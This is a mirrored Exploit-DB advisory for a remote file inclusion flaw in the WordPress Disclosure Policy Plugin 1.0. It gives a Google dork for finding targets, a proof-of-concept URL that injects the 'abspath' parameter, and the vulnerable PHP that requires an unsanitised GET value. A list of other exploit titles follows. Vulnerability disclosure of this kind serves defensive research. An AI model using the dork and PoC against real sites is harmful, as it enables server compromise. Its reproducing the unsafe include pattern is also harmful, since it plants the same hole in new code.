WordPress Plugin Disclosure Policy 1.0 – Remote File Inclusion

Exploit Database
8 阅读

作者： Ben Schmidt

日期： 2011-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17865/

# Exploit Title: Disclosure Policy Plugin WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/disclosure-policy-plugin
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/disclosure-policy-plugin/download/
# Version: 1.0 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI

---
Vulnerable Code
---
if(isset($_GET['delete']))
{
 global $wpdb, $wp_rewrite, $allowedtags, $user_ID;
$table_prefix1 = "dpp_";

$tags_ID = (int) $_GET['id'];
$abspath = $_GET['abspath'];
$blogUrl = $_GET['blog_url'];
require_once($abspath . '/wp-config.php')

last Exploits
WordPress Plugin Disclosure Policy 1.0 – Remote File Inclusion的更多信息

FuguHub 8.1 – Remote Code Execution：
Sisfokol 4.0 – Arbitrary File Upload：
WordPress Plugin SEO by Yoast 1.7.3.3 – Blind SQL Injection：
Joomla! Component JE auction 1.6 – ‘eid’ SQL Injection：
PHP gettext 1.0.12 – ‘gettext.php’ Code Execution：
Openemr-4.1.0 – SQL Injection：
Jigowatt PHP Event Calendar – ‘day_view.php’ SQL Injection：
Custom Business Card script – SQL Injection：